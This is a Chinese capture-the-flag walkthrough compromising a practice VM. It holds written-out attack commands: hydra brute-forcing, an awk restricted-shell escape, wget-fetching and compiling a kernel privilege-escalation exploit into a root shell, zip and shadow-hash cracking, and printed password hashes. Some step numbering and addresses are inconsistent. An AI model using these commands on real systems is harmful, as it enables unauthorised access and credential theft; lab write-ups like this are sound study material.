仅供个人娱乐

靶机百度云下载  链接：https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取码：a8ox

一、主机发现

arp-scan -l

二、漏洞扫描

扫描端口

扫描网站目录

御剑或者dirb http://192.168.85.144:8180 /usr/share/dirb/wordlists/big.txt

三、漏洞发现与利用

发现http://192.168.85.144:8180/vhosts

1.添加日志记录

在本地hosts文件添加解析记录

4. 浏览器访问http://mario.supermariohost.local:8180/，别的什么都没有

5. 扫描目录,扫描出来如下目录

Dirbuster

5.发现http://mario.supermariohost.local:8180/luigi.php

6. 发现http://mario.supermariohost.local:8180/command.php测试luigi，发现存在

2.使用cewl爬取和john解密

使用cewl爬取站点下的可疑用户名作为用户名字典

john在该user的基础上生成相应社工密码进行爆破（不一定成功）

cewl http://mario.supermariohost.local:8180/ -w /root/user.txt

john --wordlist=user.txt  --rules > passwd.txt

失败

使用hydra

登录成功，但是限制的shell交互

这个受限制的shell，想到之前的rbash提权操作，正好这里也能用vim命令，但并不能绕过成功  help查看靶机能够使用的命令

发现能使用awk命令，查阅资料，发现 awk调用shell命令有两种方法：system与print

3.调用awk产生交互式shell

尝试切换到正常的bash：  awk 'BEGIN{system("/bin/bash")}’

绕过成功后，查看靶机版本信息，好老的版本，目测应该有漏洞

上kali 中search一下

4.漏洞提权

searchsploit 3.13.0

直接kali开放apache，

靶机wget就ok

wget http://192.168.85.144/37292.c -o /tmp/37292.c

将该.c文件进行gcc编译后执行

gcc 37292.c -o rootshell

执行   ./rootshell

成功拿到root权限

用python切一下shell

python -c 'import pty;pty.spawn("/bin/bash")'

cd /

cd root

ls

进入root目录，发现一个flag.zip的压缩文件

也是经过加密的压缩

直接wget到kali进行爆破吧

wget http://192.168.85.144:8180/flag.zip

5.fcrackzip爆破压缩包密码

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip

爆破成功，密码为：ilovepeach

6.get flag

靶机作者的用意是要拿到靶机上所用用户的明文密码

在靶机中，查看etc下的shadow

共有

root:$6$ZmdseK46$FTvRqEZXdr3DCX2Vd6CXWmWAOJYIjcAI6XQathO3/wgvHEoyeP6DwL3NHZy903HXQ/F2uXiTXrhETX19/txbA1:17248:0:99999:7:::

mario:$6$WG.vWiw8$OhoMhuAHSqPYTu1wCEWNc4xoUyX6U/TrLlK.xyhRKZB3SyCtxMDSoQ6vioNvpNOu78kQVTbwTcHPQMIDM2CSJ.:17248:0:99999:7:::

luigi:$6$kAYr2OVy$1qBRKJIWqkpNohmMIP3r3H3yPDQ9UfUBcO4pahlXf6QfnqgW/XpKYlQD4jN6Cfn.3wKCWoM7gPbdIbnShFJD40:17233:0:99999:7:::

直接拿去kali进行john解

7.John解密hash

john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

实验失败举例

./unshadow /etc/passwd /etc/shadow > passwoed.txt #将shadow文件导入passwoed.txt，也可以直接复制shadow文件中所有字段或第2个字段

./john password.txt #对散列值进行破解

cat john.pot #查看破解结果

最新文章

1. redis cluster java client jedisCluster spring集成方法
2. hdu1520 Anniversary party (树形dp)
3. Ecshop后台订单列表增加”商品名”检索字段
4. apache使用ssl数字证书
5. 在Python中怎么表达True
6. jquery的相对父元素和相对文档定位示例代码
7. Android Fragment实现分屏
8. java中的浮点计算
9. android 环境使用smack 必须注冊的组件
10. 第七十一，CSS颜色与度量单位
11. mysql 开发进阶篇系列 2 SQL优化(explain分析)
12. Vue获取事件源
13. Win10 15063 开始运行不保存历史记录原因和解决方法
14. PHPExcel所遇到问题的知识点总结
15. 设计模式---组件协作模式之策略模式（Strategy）
16. Mysql 性能优化5【重要】数据库结构优化
17. uploadify3.2.1 多文件上传总是只能上传一个文件
18. spring 中 AOP 功能
19. 防止xss攻击的核心代码
20. Web应用程序使用Hibernate

热门文章

1. Django（69）最好用的过滤器插件Django-filter
2. Golang学习（用代码来学习） - 第四篇
3. Pandas高级教程之:category数据类型
4. ceph-csi源码分析（6）-rbd driver-nodeserver分析（下）
5. Unity中的.Meta文件
6. 基于C#的socket编程的TCP同步实现
7. 16、lamp的搭建
8. PO,VO,BO,POJO,DAO的区别
9. Message /index.jsp (line: [17], column: [45]) The JSP specification requires that an attribute name is preceded by whitespace
10. 【Azure 环境】Azure通知中心(Notification Hub)使用百度推送平台解说